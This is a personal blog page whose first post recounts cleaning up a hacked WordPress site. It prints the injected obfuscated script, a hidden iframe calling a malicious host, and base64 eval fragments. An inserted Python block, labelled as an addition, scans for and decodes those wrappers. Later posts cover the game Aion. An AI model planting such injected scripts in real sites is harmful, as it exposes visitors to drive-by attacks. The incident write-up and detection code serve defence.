Spring Cleaning – Of Hacked Files

I do feel like I have to post an apology. Even though I try my best to stay virus free, apparently some still slip through. I recently decided I would upgrade the WordPress version to a newer one, and ran into some difficulties/error messages and such, like the WordPress Dashboard reloading or getting redirected to some URL like iss9w8s89xx.org or something. I'm not sure how long ago the blog was compromised, so my apologies to the visitors of the site.

After some searching I found the source and cause of my problems. Apparently it was caused by using CoreFTP and saving the password in that program, which some virus on my computer managed to get into, and which then got access to my WordPress blog.

Especially noticeable was the code fragment which appeared on the bottom of every page:

<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>

This appeared at the bottom of every single page, and after some searching around on the net it converted into:

<script language="javascript">eval(unescape("document.write('<iframe src="http://iss9w8s89xx.org/in.php" width=1 height=1 frameborder=0></iframe>');"))</script>

I used a java unescape decoder to decode the script, if anyone was curious.

Oddly enough this code wasn’t in any of the files, but I later found out that many of the php files in my site had fragments of code like:

eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvY

or

Y29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1

etc
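A defender's scan for the two wrappers quoted above, added here as an example and not part of the original post or of any tool it links to: it finds `eval(unescape(...))` and `eval(base64_decode(...))` in site files, decodes the wrapped string without running it, and pulls out any iframe URL. The function names and the PHP sample are assumptions made for illustration; the JavaScript sample is rebuilt from the decoded text shown in the post.

```python
import base64
import re
from pathlib import Path
from urllib.parse import unquote

# Wrappers quoted in the post: JavaScript eval(unescape("...")) and PHP
# eval(base64_decode("...")). Curly quotes are accepted because blog
# software often rewrites straight ones. A closing quote is not required,
# so truncated fragments are still flagged.
WRAPPER = re.compile(
    r"eval\s*\(\s*(unescape|base64_decode)\s*\(\s*"
    "[\"'\u201c\u201d\u2018\u2019]([A-Za-z0-9+/=%._-]+)", re.IGNORECASE)
IFRAME_SRC = re.compile(r"<iframe[^>]*\ssrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def decode_payload(kind, blob):
    """Decode the wrapped string for inspection; nothing is executed."""
    if kind.lower() == "unescape":
        return unquote(blob, encoding="latin-1")
    try:
        return base64.b64decode(blob, validate=True).decode("latin-1")
    except ValueError:  # truncated or corrupt base64
        return None

def scan_text(text):
    """One finding per wrapper: (kind, decoded text or None, iframe URLs)."""
    findings = []
    for kind, blob in WRAPPER.findall(text):
        decoded = decode_payload(kind, blob)
        urls = IFRAME_SRC.findall(decoded) if decoded else []
        findings.append((kind.lower(), decoded, urls))
    return findings

def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Map every matching file under root to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(encoding="latin-1"))
            if hits:
                report[str(path)] = hits
    return report

# Decoded footer script as given in the post, re-encoded byte by byte.
DECODED = ("document.write('<iframe src=\"http://iss9w8s89xx.org/in.php\" "
           "width=1 height=1 frameborder=0></iframe>');")
JS_SAMPLE = '<script>eval(unescape("%s"))</script>' % "".join(
    "%%%02X" % b for b in DECODED.encode("latin-1"))
# Constructed PHP line with a harmless payload (the post's are truncated).
PHP_SAMPLE = '<?php eval(base64_decode("%s")); ?>' % base64.b64encode(
    b'echo "constructed sample";').decode()
```

Run `scan_tree` against a downloaded copy of the site rather than the live server; a finding whose decoded text is `None` is a wrapper with a truncated or corrupt payload and still needs a manual look.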

If anyone else runs into similar issues with their blogs, go to:

http://www.google.com/support/forum/p/Webmasters/thread?tid=6f4cf473c414de1f&hl=en

for the solution on how to fix/clean your WordPress blog of the hack/backdoor.

Some other useful links for me this time around were:

How to find a backdoor in a hacked WordPress

http://tools.tortoisesvn.net/grepWin – program I used to strip the code from my pages.

Anyways, hopefully I managed to clear out all of the nasty scripts from the site, but if anyone notices anything abnormal, send a message through my contact form.

Some parts of the site or links may have become broken due to cleaning/stripping the malicious code, so I would appreciate it if you bring it up to me when you notice it.


Happy Holiday! Goodbye 2009

I just wanted to wish everyone a Happy Holidays.  Party safely, play safely, and see you all next year!


Aion Online – Cube Expansions

Well, I was going to put up a post about how to expand your cube to a full 10 lines worth of space, but Zumbaro at Aion Insider has already posted one. So if you're in need of more cube space (aka inventory room), head on over there to find out how to max it out. The only note worth mentioning is that the NPC Vindachinerk spawns at the Ruins of Roah location between 1am-6am pretty much all the time. I've never seen him at the other locations personally, though this may just be bad luck on my part.


Aion Online – Live Status Tools – Freaking Awesome

When Warhammer was released, and they had updated ranking information with the realm ranks and everything, I was stoked to be able to see a real time updated database of players, their gear, and their current exp/renown rank via the Character Search function they had. However, NCSoft's Live Server Status for Aion is definitely superior. You can check your population ratios for servers, characters, character gear, character stigmas, abyss points, and you can even check your in-game mail/auction house item sales. There's even a 3D character model that you can view to show off your character. Wow. Just simply amazing.

And in case you’re wondering what I’m up to, here’s my character Xight on there.


Return of The Player – Aion

Now it's been quite a while since I last posted anything on here, but I'm just writing to let you all know that I'm alive and still around. This past summer has been rather exciting of late with meeting new friends and whatnot. Also, since I live here in Maui, I figured I'd go out and catch some sun before getting trapped in my room by the next new MMORPG to come out. I know that I've been ranting about wanting to play something new now, and I think we've found our candidate. Aion. I'll be looking into this while it's going under open beta. Which, if you would like to play, you can download/play it now with a preorder.
